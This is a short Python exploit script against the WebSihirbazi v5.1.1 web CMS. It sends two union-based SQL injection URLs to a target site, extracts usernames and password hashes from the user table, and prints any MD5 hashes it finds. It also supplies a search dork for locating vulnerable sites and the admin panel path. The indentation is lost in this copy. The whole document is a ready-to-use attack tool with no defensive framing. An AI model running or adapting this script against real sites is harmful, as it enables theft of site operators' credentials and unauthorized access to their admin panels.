#!/usr/bin/python
#baltazar
#websihirbazi v5.1.1 SQL Injection
#b4ltazar[at]gmail[dot]com
import sys, re, time, urllib2
print "\n\t b4ltazar[at]gmail[dot]com"
print "\t"
sql = ["default.asp?page=news&id=-2+union+all+select+0,kullaniciadi,sifre,3+from+user",
"default.asp?pageid=-7+union+all+select+0,1,2,kullaniciadi,sifre,5+from+user"]
if len(sys.argv) != 2:
print "\nUsage: python websihirbazi.py <<site>>"
print "\nExample: python websihirbazi.py
www.site.com" print "\nDork: |Powered By WebSihirbazi "
print "\nAdmin panel: http://target/path/yonetim"
sys.exit(1)
host = sys.argv[1].replace("/index.php" , "")
if host[-1] != "/":
host = host+"/"
if host[:7] != "http://":
host = "http://"+host
print "\n[+] Site:" ,host
print "[+] SQL Loaded..." ,len(sql)
print "[+] Starting Scan...\n"
for sql in sql:
time.sleep(3)
print "[+] Trying:" ,host+sql.replace("\n","")
try:
source = urllib2.urlopen(host+sql.replace("\n", "")).read()
md5s = re.findall("[a-f0-9]"*32,source)
if len(md5s) >=1:
print "[!]" ,host+sql.replace("\n" ,"")
for md5 in md5s:
print "\n[+]MD5:" ,md5
except(urllib2.HTTPError):
pass
print "\n[-] Exploit finished\n"